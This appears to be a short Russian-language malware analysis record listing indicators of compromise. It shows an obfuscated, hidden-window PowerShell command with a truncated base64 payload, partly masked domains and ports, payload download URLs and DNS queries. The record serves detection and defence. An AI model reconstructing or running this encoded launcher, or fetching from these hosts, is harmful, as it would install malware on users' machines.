Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e KAAgAG4AZQB3AC0AbwBiAEoAZQBDAFQAIABpAE8ALgBDAG8AbQBQAHIARQBzAFMASQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAVAByAGUAYQBNACgAWwBpAG8ALgBNAEUAbQBPAHIAeQBzAHQAUgBlAEEAbQBdAFsAYwBPAG4AdgBlAFIAdABdADoAOgBmAH...
- 'op###flows.com':80
- 'sq###help.com':443
- 'pk#.goog':80
- 'si##ans.sg':80
- 'si##ans.sg':443
- 'le##t.sk':80
- 'go###oot.net':80
- 'go###oot.net':443
- 'st###brown.nl':80
- http://op###flows.com/8aqUoo4/
- http://op###flows.com/
- http://pk#.goog/gsr1/gsr1.crt
- http://si##ans.sg/IJNNaK/
- http://go###oot.net/ujEKc/
- http://st###brown.nl/3YA1kb/
- 'sq###help.com':443
- 'si##ans.sg':443
- 'go###oot.net':443
- DNS ASK op###flows.com
- DNS ASK sq###help.com
- DNS ASK pk#.goog
- DNS ASK si##ans.sg
- DNS ASK le##t.sk
- DNS ASK go###oot.net
- DNS ASK st###brown.nl
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e KAAgAG4AZQB3AC0AbwBiAEoAZQBDAFQAIABpAE8ALgBDAG8AbQBQAHIARQBzAFMASQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAVAByAGUAYQBNACgAWwBpAG8ALgBNAEUAbQBPAHIAeQBzAHQAUgBlAEEAbQBdAFsAYwBPAG4AdgBlAFIAdABdADoAOgBmAH...' (со скрытым окном)